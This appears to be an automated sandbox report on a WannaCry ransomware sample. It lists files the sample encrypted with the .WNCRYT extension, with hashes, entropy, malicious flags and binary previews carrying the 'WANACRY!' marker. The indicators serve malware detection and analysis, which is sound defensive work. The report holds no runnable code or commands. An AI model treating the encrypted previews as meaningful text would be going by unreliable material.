                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....a.s.2|N....f....3:......TP..AH\......t.B^..].F.j~b6r.'.....N.z.^...e..J`..1..3..ee\CN.....n...Dx...D.....3....s)..<b1.....t_.(.......*.....N>...._.|.%....dU....4....O.j..e......u.0..v....;..B.N..F.&.(F.{..v.N..Nk~..5c..+.A...Qy.N!.K.|{..X$.............h(?...z.....cM..

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5a1caf4e-992d-4eb4-b7f3-9cfc9fd49e6a}\0.0.filtertrie.intermediate.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):38040
                                                  Entropy (8bit):7.994866349290046
                                                  Encrypted:true
                                                  SSDEEP:768:UP07JS+WpTGwCFSMz1ZTq4Hjh0U/U1gcfRxXUid6LWj9GRcAxgqgmWF+h4g:4Wh95xRZ/MhxKy56cAxgqAF+h4g
                                                  MD5:6725664808B500996AD01097968D9EFA
                                                  SHA1:9C03C6D447016D05380823B860B06C5C3677EBB5
                                                  SHA-256:C9B1D8FFB20BE451531ED6E71EA68F7E02DFFD9844A95591F0C691A4D59B2C57
                                                  SHA-512:1284671E71D771A2577E04C9178D13835638E58378DDE9965D96DA808BCEB0D73BB591BD2B7B582701E1834AAEFDE76008ADC178E492948699D0079274048EEF
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......W...91vv..c.x...X..]2....<NK./.t.....".p+..9r..b.s.u0@.....N![..E.5.;.v. .l......N.}/.$u.|G@..O..&......w......q....r..o..{.......L.<o;.*LBd+L}o..s......l.d..`...L..Un.Szj{.1.C...#;......fa.%.K...$..4..#.....?1..ipj.#:.....?.1.U.j.w..U.(. ...Uc....v.........T........D....9....:7.,.l.l.2..Q..&;.U.P&...P.=...F....|>#.H=.".G...~!H-..4..M.ZCQ.y.....{.@.j.C:.../.3.%8`.P/.........8.|. s.f........SJ..U.......s{...ve/?t...N.0....c.Wk........0...9..$G.-8. ...Q7..jrxh.......LU ..;.[...........Z-{.e.E0;.5D=..1{&.e...l.(w..0z.#,.q...0..n\.......`..*!.]......Sp.....d......=4..z......%?..T.XI...%....id.o%}..M.nd..Tle.":-..ja....H...@.Z/m...Zn..Qa. V./.Mh.96.a...&.8j......P!....1.!%m..........l....`.....RCB..+. MR..C.G}R.z..z.}>....*}P..Y.....]'}.......!..N...y..9........rO%c.....y.m.m....P....b.3..M..K..`<.Y.........>...D.Lr...I.t........~..A..tyg.C.'a`.sF...?Y.m.A0..4!P../..N]o.6..S..L.`.Z.e...^.N.gt.G...u..O.......L.9.E...'.<...(.

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{730830dd-534f-42c8-8160-bd245bf51290}\0.0.filtertrie.intermediate.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):38040
                                                  Entropy (8bit):7.99442180691795
                                                  Encrypted:true
                                                  SSDEEP:768:QYJzKY+0gZhJ9CLredbwYaAqOlLQHkKKvhErLsRyK9JObXjNdo+B:QY4YnLreDaYhcfLe9ObQQ
                                                  MD5:56ECFE79CBE829895E3A51E39D133C28
                                                  SHA1:7B8C9DA54FC6B7CF78CD19BD65D18C7BF9E17926
                                                  SHA-256:6A69082DC1E4757C6D1A88C9026500B47541AE8B6582275BB9C7471E1FBF594B
                                                  SHA-512:888D7F9F1225D96913B00C51BAA37D30C1A10E6E8C4D41AF7FAF85353EB2DC25CE695B1A8E378C5C030E8652EE61633C3AC3B05FD22629ADEE384EABF74A7E85
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....c...'s....#....R.D..7..E1 :....x.&v....i#...tF..R..N.{w...Y|: ..a....X.........k.T..p7D7$K..c2L_.`.#...{.........=.$...^.|.].vd.(........V...f..9..)......FC..l\..Uu......d#... .2...%.\.]kP.I..}...G@&...5..}IL5..:..L..Wl.c..j....h...H."..f..xWV......v.........+.9..rnLvE7(.2k.....OKF........+..C....,..3..h{.Lc.9.E.:....TN.M....\.......Dc.....7......c.AnCY.;...>Y.w.1......<.z...(..a..m..................3.)..K....y5.....~.Y\7..0....6p.T.`K..Y"......z.<!...g.w....3s....'I..R.H..q.'0..S.y.Z....H.: ..L....X.^X..-..;.dMh&..H...s.......$.S.#.r..9..6.t.../...6.......... .5.$.VU?.-..{.\../Au..htj....:...P..m9l8.eD.N!..S...../...9..s..z..|.b.p.}6..}..G..x.....QEf...(q-E<..Hb+.>Q./..M.h..l3.v......$..D..r.%.RN...>..`S"2.g>...d......1x2PN.Qi&...h.....;#].f.g...T.7....!f....t.n3VHv*..... .l @w..\\.....*..R.>.....O...;..PK...~XDN..]a...J.a.....8...`"8...I...`+.j...o.....J.._.F...&4).6jm.2.4O..1..T>.........^Is....b.~Y....B..}Z.)i.w.r.m~}./.~.....v

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{730830dd-534f-42c8-8160-bd245bf51290}\0.1.filtertrie.intermediate.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.071208805067209
                                                  Encrypted:false
                                                  SSDEEP:6:bkEvz4fO/ISsQkx2Ah9xm1cU42VBkBwDJr32BgA:bkEBgfQkx90cURV8wDBYv
                                                  MD5:A80183884573E0F8BADA768CA3F0AFD2
                                                  SHA1:7ADDA844AB7FC9423573DB097DFADC3499B396B3
                                                  SHA-256:21CEE0F2C50929D46A9B5CCF1B3DB32391167FD8754A74D01008CDEA40F778AF
                                                  SHA-512:044220319E3BA3F14EE5B8260C7879DD8770447AC948E9F39B6341AF656E2F94986DEE794F9F3A8DA0A5287A21325874BD004442DA9F0B95E112E1309D5A9D19
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......%.,.m..+...WjAk/v.....qb.d......H%.k=.(....<C\B.|....w.m...Z?.X.n...x.v...~..w.."...V0.BL.....i..8..J.......0..|..r...rp{Z5...9a.m........x9...=...9.J{N.ib.qJ...J.....#.^1....ft..].....e...{.pR.Z...(...q.o...;:..C.*.,w...?h#O%...fq. ................q._j..._l...Z

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{730830dd-534f-42c8-8160-bd245bf51290}\0.2.filtertrie.intermediate.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.17784749605306
                                                  Encrypted:false
                                                  SSDEEP:6:bkESypvfTCFM2vhIMD2p6q9UBXjxIphnDLAQQjlOOg71s66l/R:bkEXvfTCFMADbBXdIphnPsjdX66l5
                                                  MD5:C6B443B620C2242EBE3A503749415CEA
                                                  SHA1:70410C696A99AF440936CBB4C5D91CCCCB3F1595
                                                  SHA-256:2F34DF8B98E9BB0BBAADF7595059ACF9A3E908EACF8DAB15AF4418F5DEA8B6A1
                                                  SHA-512:39489A65EC86507658C704912901FF8A84E1CC13D94B3F1BBC4085DE5DB704F7D85A8F25ADBD5690B46A2BBB7F1106A31670F5934C5A3CD1C41B9E15A7DEB241
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!........[./L..xl..PbL!.3e..6.L..H.,...c....S.....g.{::}Z......a....~..l.a:.NJ.....N..a.i(U]/.-6.1.. ......<.ja.9.f6....:..l.n.q..~....W.`...xw.M..)......-.F.l%.Cx..p.;.|...X..r....I.u........ ..5..a.*.%.[....P.c3...I;.....Y;.Xf..)....A...&.?....&....................1...d.

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ffa119a7-1647-4b3c-8c37-1046f5a858f2}\0.0.filtertrie.intermediate.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):38040
                                                  Entropy (8bit):7.995291944460258
                                                  Encrypted:true
                                                  SSDEEP:768:K9Iduya5ghwyO5H8Sm9ItP7ThYgDePODTVIg1iOFGl:YIMghwpyKtD1zDMOlhiOFo
                                                  MD5:414C38FC49425AA5CFC59EED77BA3BAA
                                                  SHA1:004848566D9A798036E65C1207E1F2EE12726C5A
                                                  SHA-256:6DBD82544E19C834E2A1596BAA5270C2AEF818BDFF315AB6250E45C70E07766F
                                                  SHA-512:01AEE161FB9581C8AA516AD85B5EE99BD916DDF48E881F65B5A8ED96039FA06537CB8F3F66074FCF0DEAAF3411AB532F65A05AE6626F2693E2418610F1345CA8
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....b.^u...M.t%..3S.d..}.....`..:h..#...PPbR...%......LL...oz..C?........x..t..t.Pq.....kj..z..I.i.m..$4...*..ou.8,4......XW....$..sqd.f....QT-.T.8.=.L....z.:w...[......a.D..h.s..........v.ZZ..YB..9...s..<,.{F....o.O6.Y....Y..UM...V...-......._T..=....v........:Z.U!R...6.i.=./....QD...?6.?1>....rN....2.p_..u..!.....T.X..[..s.....Q:bVG.:.(...?E.+b5...O5u..-.dC..?$..^.v...dr..p....C.9`i.e. .\..X.a.?.X.............C.`..3'.p$.>.;...A......au.a>..p....I.9...Q.{../O.R....W3.+..y..........1~=.p.I...H.XBH8.Z..O...'.Awk.fK..b...K...p...-.v.!f..R..Gh...$.[....*.B...\...b['B._..)2M...J..:B..D..W...@.....A$d..Kq.q.X.B.TPw.......9Fu..L.0.1..chN......3`Oa>^....1...!9m....+_..2\.....\..#...~-{t;}8..X.&.*>.TD.z.Z..H;..'..&q.[!......f.J..s.....I.F>...........5......1..w,.x.*Q..W._...2=.v.u..._.QH.....s.Rq......3q.j..-.+9.=.^...4._..JjG.d.a.....2.U=.=.....U..j.....b...A..=l^.*5..)...B......+A...........>.<.'t....isy0W..........E....H.0G~..N

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ffa119a7-1647-4b3c-8c37-1046f5a858f2}\0.1.filtertrie.intermediate.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.095447632791024
                                                  Encrypted:false
                                                  SSDEEP:6:bkEekFVEj08XKVVYGNwv1jmX8sCAr1yTsa8fogXHc/cPtg:bkEe1I8XKUGNwv1a1184a8f9XHcEPK
                                                  MD5:7DC421D7D01BEF8D4788532E0CEC190E
                                                  SHA1:94C8BF64551FB6D9079FA4AB2CF6512D0A29B378
                                                  SHA-256:01B13EC35157CFB1972600BD9CEB154BABE9AB7D03EE1FCE2D51411E2C31A0A6
                                                  SHA-512:A7D79EC6A7E2C819E832D27435C0D59680E98492AEDB436AFC00B9496DF385843A55E035A9DE1D428BB55261F7B769EEA6BBCD679CBA5F82EFCF149EB2457AB3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......?.}r.9.>.P...?DA)aps2....e...v.}.@..."eo.}.../..,9.[.2a;^}.T..0.k..%..t....p...LS...S.[....t^<.6....x<.aY.......L7..R.e.p...h..&.[a.B?..LL..&nq.Z.'...M....q.Z..z.Iu8wE......8......UJ".kx.....0(EHq.....H..s.PC.'k......>U.-/..d......=....:.)..............&.<Mx..%e...~

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ffa119a7-1647-4b3c-8c37-1046f5a858f2}\0.2.filtertrie.intermediate.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.197736713988416
                                                  Encrypted:false
                                                  SSDEEP:6:bkEGiBUg8eCGDrldQAnRFBFvEc3qYmY8ISOKLwYomhH:bkEC3+ldQSRFBFv13qY/8IJKLwo
                                                  MD5:C448AB152837E7E0B6F7B54300EFC69A
                                                  SHA1:4743622931F617822ED346B02EEDD6DC821551B0
                                                  SHA-256:C47FA0D36DB496C143A0BDADEBC4D705F93D7726F765E38C53C48E7FDF7120F9
                                                  SHA-512:51B8C282CD95C69F4A86B549B7DE74DB4E79D3471C5D71C30C32BA7EF4F1011948CB62ADE4905CD1462D611655EAB4330A03D5E948ACDD80BAF1D9CFC2B92741
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....&....*..e.k.nQ.0?.os&..L...x.N.x...;.....Hs......D....0.cD8.3..,i...f."..x.....6r...MYz?..ox..m=....V.G.G.Re.C.......Y.@.;k...'...q/i...,S.*].JX.9...s..#...@......)..V.a...4<....U.e[.k....$..4.j........@w.N.P0%..L.......2.;J6=..=.....1y.DY.}............<.6.......$.

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appsconversions.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1426184
                                                  Entropy (8bit):7.999872830469767
                                                  Encrypted:true
                                                  SSDEEP:24576:nGK6jJ5LsCw9+muSrvE4O1FhxScg5LRh070Ii59qNW+fmaVnq71WVcsvEZCD1OhL:GK6jAC4TjveiNBRh07s59qN1fmqnq71Z
                                                  MD5:73D409807E07B9F78D372B3F1ACBA0A3
                                                  SHA1:00013C43E940E6064DB7A2189CCBA46E4EEB9560
                                                  SHA-256:54FEB3A4BCA0EDB25A3B4D126EFCC4D9DA1DFFB68BF1B2729EB8EFE955091883
                                                  SHA-512:371B005C1F3F2F296A49C5B42870FDF4DDF0E08AC5751F1E598B7E28890C2B7283943C59E2337A15F912A1F1040EBE23BACC98BDB439F0F50B78056242003CB8
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....E...k..Q5.._o.e^.......H....p(h.2.x../.|...KA..x9&5..n..u9C)A.h&..yK..AtEY)...-.:.q.Q.....u..Q4.....\;.....v,.0...\JL..*..m..N.-...!../.h......44(R.:...a...g.W?GMA.M.y....w3@.g..X.Xg.Q.3!)..mD#;b[...r.9'c......B..h7..!?.X..........q..G...x.N............J..d-..@..f=N.0p...3r.VW..\4K...J~..X......o....l.a.1...@]X0..f..nF.t4..n/./..k.....I..H!.X.i'.!..F..CG.........&z....gHj...W3B.8..R...a0.@..:J[..i.uE..@..A....oP......Z.w...K.|.F......)....R##!^...,Sm]..].-.Yv......S..i..+.k#..1V.#..Q.K\.L1..uj.........,9.VY.L.2'@.P.r.X.......gt4...[..J...S.j..B6(._TFx.m.......?.#.Z........b.'|.w+S.....sf.......J.+.....#...V6...W..a.tY..a^......m. .M........s..*._D.Q..@..v...8.-@...ycxt..UX..J..Uu...e...[.......D@,q..N..9?..u..F.&.<.j.F.D.pO....G.y.....~..1xn..8.T..5.......;.....B....d<.N|...x^.3.....f.Y..R..,..H.>R.*....S.T..I..za......M....7.G..5.]WV26......h.........#..&r.......,...F...N....F....9.,..w..08.B+Fy....M>...../H6z.n .qR.....r..Q.]2

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appsglobals.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):352008
                                                  Entropy (8bit):7.999443577813371
                                                  Encrypted:true
                                                  SSDEEP:6144:5NNhIDmuHqItN6E2LbaY7LcY0UlrJPyHdi35z1pBEkABXCIJcf5fbj:5ODhHq8N6E0aYc0d6UpbBcjJ+F
                                                  MD5:600554237B50A462CDA07251FA11552B
                                                  SHA1:D4901F0E240548E2F7FDB16B4FE091275BEC9254
                                                  SHA-256:DE03E76B11C7C9F7904B9B342B69A369E4FDAE2CC92B658AEA0E3BE485DCDFEF
                                                  SHA-512:1AADA2C4ED526F5BFDD09325800348D51B49C910B829E5038ED920903D03AE275CC420A77D10955422C788BD8EF3ECC13CEBBCA802E5AE61CCEBF02BE25196AE
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....~.S.[0..JFIS....vQ;.......?f..&."...I..ah....A......m..._i......fc..(-\hozsf.....0..J.&.)......~..A.q.:@..I-n.v.mM.....h'F.4f..P.T....`.'..E..z....b......~J.I.9u..v5..d.&..8RM4...`.b...}.4...........2t.-....9......:m0M..?.B.o....@i..y,.1K4.x........]......%.c.&D....\..`d.a...fg2.6.....C.balo..,t..yfX}..........f.<...J...j.Hu..@W-.\...ZoGd....i.]...)}..@....qD2.4.k..q7...e.*.@>?.}1..n}A...5.@Z...9-..n(fj.)..l>BQ...7..7.J".D.@>.`zO..8x....].*....B..u9.9!.d..P.........o...>.m.}.;n....~.....T.o.<....b.?..`4.l.`..q1 ..k.....za.]..JR9.{b..B.1.cmz`....h...].M6..#]{u!w....?....B.W./.-l-.....s......i..=.F3..P..[E.....:..J.......?..3(.;.......Bb.-% .o.R)......M.....R...jI..`......k.J.T@....'...QVdf.CH.......9c.3.-........O.IS}{V<......j....).G@.~.X`.......@..W....lN-...Px..]...x.O.h.UhU<...X.....u..T/....,6o.[..D.@!z;..o.C....H.A.F<...H..0..)....EK........ ..y.>...bHm.bb.....UD)..!g.0.Ck.!. .k..%/.5......[.-$...O..{.m....U....U.|..

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appssynonyms.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):243784
                                                  Entropy (8bit):7.999279212841311
                                                  Encrypted:true
                                                  SSDEEP:6144:rW5Y82drj5y30OM6zKbXbti9EYXlLs9/4WuET4y/m32gOu:rWa8qrc3u6ohIPloH42m32g1
                                                  MD5:4ED02A856E11E67A95A8A5B1CB674C7C
                                                  SHA1:9A4127BED213906B845FEA489136738ADE2BF463
                                                  SHA-256:DA24EB646E000233AEDF406A80E87CF6940F92D689F2DE93B395CC74E38B39FC
                                                  SHA-512:C26AFD461808E0CBE0C2072FA886D800056DB5AC461BE7C4C8FA771D700AF22EDFCF000851C78E0C9BF37C1E4F88377694F254C2E5726A9CD4F8D37E56079748
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....L7=...0.4.xF....c....Wg.NI..QO.P{ES.c...?..S..h:`.C{..(..0.y:..`..+=..bw.3.X.VW...y.d2n7...Pe...=H.F.N..N..^&.......Z..<W..........K..R..N1 %...k.......]l]q[B.l.&.h`.%..F2...C.z...c2.9.. ....4.......4 .......,.]....'.o0_R.....*..@v........O.....&.......t.....Pb.#f.Y1$z..>......^c...5.4A..$....U........i.-.E.<..Y.p..l...^bl>%..\...q..)...........d....:.....D...I"].e.`2.Z...7..6<._.(..D..m..!.{.D....-...@..U...>.fD.r8.._-.._.U.-.....v.)...N..8..._.....)..M...6.!.Vt.... .*..6'.e...tDmv.@..../..s. =W.b..u...1.o......U4.......S....5?..H...U...Q.w..../.VP..*e..gzJ~]._...u.......?...V.N...............r.. 7.l.n.....:%L:t.;..a....;ja.jb..+CdX....lf/...m0%R72.Pnz.Z.&.?.%&.E-......&3Ik.M&..g03.d.Dx.......o.,...Ft....7<.O_d.b.`..*L...X.s..:f...C52..Z.."...X-...S}.B..d....X...gLUk.n....f.Ml.W..v....1..XeQ9.....;w..?....ma.......z.C.Q,....v.........^.h,........E.....|.H..J.B...7IUz............,..Q.....-h.......".!k......K...h{.r)9.l.q>._"

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingsconversions.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):533032
                                                  Entropy (8bit):7.999698359614149
                                                  Encrypted:true
                                                  SSDEEP:12288:UsRzd9qlwrL0uMPw5rP/r12HB0h2rzwSJkn9zeGrdsy62:Xzp4ZIVwHB0h2rM3njss
                                                  MD5:4DEC3D670ADEFE009000488A6DFEFC99
                                                  SHA1:796DCE1B46826AEDCF697424079F594A204FFA14
                                                  SHA-256:EA8D22C66444A1CBAD225BA947F04B20834DCD233906CDCB2991C45BDF9F2450
                                                  SHA-512:CA285EA26560BEE08903696D3B592E6E28EDFB13CD12401BFD35EF4FE8F355DEBD3298841F0EC77FA7810B8F3AB6997C438530556F701277232E6A0CA76270EC
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......7..&%....-4.q.V&....P.d..M?.&J.N...,.k....EQ)*.........[-........m..>.._.u..#t. 0..(..S{D.P*8.).p.,"....H>.../).4.mZ;.....+-..Z9.?..\CG...0....p.K.3..w#.XHS1+..ki.=(...W..<..R..u.V..>.$..L...[.sl.$.k..\x..|..0.].a..^BcN.?z..jN..q#.....b.9d.....!......j6.jI.Z..QV..b[B.I|..}....7^;.....p..3.C.......1.p.3.e.->E..k..Y.q..b-q5...}d8>ni.u.m.Bw...........F.&.l..DY.[R.@P..c.n=.8q..:.Ic....U.H.N..J%H..X.$..a.~.g.Y...9.W...s.z...Y..hb.W...[....$00)....1..8|'?.\....:^..%...j..\h...MF7L.`..m...UTG..C.t.5.....K+y.#g.N.....q.7.m.wC.?W.$.I.X$D}.f.....{.~. R.Q..k.\l..w..D.0.&Q.P...$a......&....GW.n.M....NS....ZL?.yJ....7.P5.+s....,....[<...'ms...^s..i.VKg....#...8.E..2....G..G..e.T......H.;....Z\..V..!.E.!$M.<...A\..VrR...T.,.wZ.R..a..).g....%.e(.A...W.iq.).......C.a..{B6T.8..d.{...iG.j...u....X.'..8.#...}...}..[yn%v.....8.V...@_i..dB5(`.J.L......-..v..MlF...V..I.z...@n....KG....d.}.`....m.F@......},....M.u=.c..=....y..g~).M...".D.

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingsglobals.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):41416
                                                  Entropy (8bit):7.996067559068154
                                                  Encrypted:true
                                                  SSDEEP:768:XRyNSpZtDNtfGkZIxntFUv/z9ApegKPVXiwIcVb/6yFfjlePX/G1dK2QYPW:nZ9NtfktWBAwJPVXiVcR6ypMPXWKMO
                                                  MD5:DC7BECE225AF85ACC679C465C641B118
                                                  SHA1:49760470B92961FE13E8D9C2FC428798561D4C2B
                                                  SHA-256:B51BB7EA6A5B484486C3BE2B76F34BE8C4961DC16E398319BBACEB0BB0511CB2
                                                  SHA-512:917B26BEC6D02E4C12AE6286BE2E6BB27FCFCAE54C69BEB685FFC5BE7419E402179990E87C8B0D7BBBB7FFE677027C033FE6465487E531F360451051EFEC44D9
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....)o....rl.l.`2.V.....J.6.D.5.vN.a!.)....z.....>.."......0:g...'ma.Lh42.......W.^...e..P.E..o..~.h_.Mr.v.....$.#.j....z........k..V...V;...}....]U.......R-A.I.W.|E...._......z.&X...\.ar.g..Vuu63.u.\_..Jk..*..VV. 3.......{ .=Lx....zl....N.=..H,6.............N~..2*..\I..8...'..Y...J....^.C...o.#.^.$A......G..=O.t...>@I.C...T.;...\.I`.k.Gs.fP.M...7...8.N....A..E.8A......8.Bw......j.d[....8.m/.Tz.]|../...?F3..U........S..z$......b.r..(..g.......(C...L.N."..|.7[(p.3...F.H;.d..h.XI.A*.|..?.f..p}O........WF......L....a......q.!m.....R^d..._y......:D.K&.;K..v..R......B.Z^....%..A..UO..l{<.O..E..$g|.?...Q.*.+...9......FW).... ....A&0..On8..5?f....`jk.4.........(....F\...?...Ayj...?.I.=D.O.x..._.8..O.]z!...._.a.O..$...DL..._..*..[v~.!.....K`.h.}._...... .z(v......k..<..P.H.n(..t0.v.9......Z.bGh.......j..]*..A......F.t.l.HI..-.'.3k....~...t.........m...9O..v...`..IZ.#...No1.......7V...#.......j.d1.c.t...vs....$.....\!..3.u+MiJ?t]R..y..6;.^>.

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingssynonyms.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):104008
                                                  Entropy (8bit):7.998294966174257
                                                  Encrypted:true
                                                  SSDEEP:3072:M4xNlwX3ktPOy0Hk65fo1Tul1BauOivx+G2pLgMPlV:MgNlwX0MnEEgybauOiJQpLPlV
                                                  MD5:0411E63884263162ED0BB6FCB6EBE6FA
                                                  SHA1:3EA982158ABA9002B67DB2FBEF56DC1F16E3DC97
                                                  SHA-256:40764A2C4BBD2DCA53D102CB4AE65EB74248FA593CD62CE257D6DFECB40488AE
                                                  SHA-512:22B9532A4767E62DE26C02683C6FC54FC977EB68685C52D4D270F6431C99A3CD9077E8B99BDE296004D0793DAAC4C97994578421494FF2C8E0DE00213805CAD6
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......]...I=..p..av...|...3!EX.B./.Q Y0.t..D.Cd|..GS]j.1.-.C.7..,.S\m'.,.%..Z.P.yg>.....d...He.[....P.Lv.`..U...4U..w...S..7.8g.\.....e\n.......(..E.5..V..$.".M.RI!..6+L........an..U........,.[!..+..<....^Z..@=.....N..b.>.m...b......q..G..7Jr...0....%.......*.9w....k..P...m...q....JvA....Ft.-lBo@.]..L.....ak......<T........._..@...._....z..m..H\...T.xu.Z.S.......k].2.c?..p..'9.T.......`e...5$...{......n.B.h.*...o.F.5....`.R.Z..Q,...M.~$U...}V...........rZ......s.N..#z.!..f....lbAHmi..xr.......0.R.1.J...A.G.s..MV&.e....J.......a...J.....f...sg....'..%.@m....E....[Qp<o.z.K.e...2......{.Y.....#).o..........L.2.nX.t..C.1.ls.%."x....8..`.........t..m.../...[.{..k.\;....U.\......D_)......~...A.}\......&.xx....P...........+yw........* ...a.w.nt.h.K*(...(0l.zDn.:..7.TA..g3z0.....f..^../...u.?O*..'_P....t..(.Yis..}..8.i.olxD....2......k.)...-....30}0..v.._.6..1..n72x....i-.BA.m*...1.-z...7.!.'.^X1l.A..9P.\..j......1.P9c.........&Q.T...

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{d33fc00a-caf3-45c1-9fbf-c4db6e8b3d32}\0.0.filtertrie.intermediate.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):214008
                                                  Entropy (8bit):7.999254386291626
                                                  Encrypted:true
                                                  SSDEEP:3072:plzujDX1cfM7lUcbrStuXtWbaHhO5Zo0nnia4AwHtMXdKTDLx2CQde5:CjDX1cU75rSt4ceHcHia4ThnECd5
                                                  MD5:4A2F90B0A9AFD0230332501F225E0D52
                                                  SHA1:37C89AF34D6A963DED8A323F6AC6B8B333987CB3
                                                  SHA-256:4E4051B15B4080CE2E314CEFFF67CD4DA778FDCE102580FD7ED00C7D08419219
                                                  SHA-512:3A529D2EE9EFA12FB900AA7A2641296391F96294CE1D5823A0A77AC373750A9C1C5E94FF89AF648829155B61EA229357292094DF2594678AE48FEB9C854E5712
                                                  Malicious:true
                                                  Reputation:unknown
